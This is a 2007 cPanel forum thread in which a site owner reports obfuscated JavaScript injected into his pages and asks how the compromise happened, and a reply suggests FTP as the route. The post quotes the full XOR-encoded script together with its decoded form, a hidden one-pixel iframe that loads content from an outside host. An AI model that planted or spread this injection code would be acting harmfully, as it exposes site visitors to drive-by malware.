The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Weird code on my page - possible server hack?

Discussion in 'General Discussion' started by dob3rman, May 5, 2007.

  1. dob3rman

    dob3rman Active Member

    Joined:
    Feb 13, 2005
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Hi anyone can help? I found out that my server has many pages with this code:

    <script language="JavaScript">e = '0x00' + '24';str1 = "%9F%C7%CC%D1%BB%D6%D7%DC%CF%C0%98%85%D1%CC%D6%CC%C5%CC%CF%CC%D7%DC%9D%C3%CC%C7%C7%C0%C9%85%99%9F%CC%C1%D5%C4%C8%C0%BB%D6%D5%C6%98%85%C3%D7%D7%CB%9D%8A%8A%D6%D0%D1%C6%C9%D7%89%C6%CA%C8%8A%CF%C7%8A%D0%CB%CF%8A%85%BB%D2%CC%C7%D7%C3%98%94%BB%C3%C0%CC%C2%C3%D7%98%94%99%9F%8A%CC%C1%D5%C4%C8%C0%99%9F%8A%C7%CC%D1%99";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

    Translated it gives:
    <iframe src="http://suvcnt.com/ld/upl/" width=1 height=1></iframe>

    The question is HOW this can be inserted into my webpage? someone has the root password of my server? because it was inserted on 2 differents accounts (with not the same user/password).

    Any clue?
     
  2. pjman

    pjman Well-Known Member

    Joined:
    Mar 22, 2003
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New York
    We're seeing this alot.

    See the current thread on this here:

    http://forums.cpanel.net/showthread.php?t=62821

    No one knows for sure why. It was probably added via FTP. Pure or Pro FTP, it happens on. Some people had success from further blocking it by changing to stronger passwords, but others have said the strong passwords don't help either.
     
Loading...

Share This Page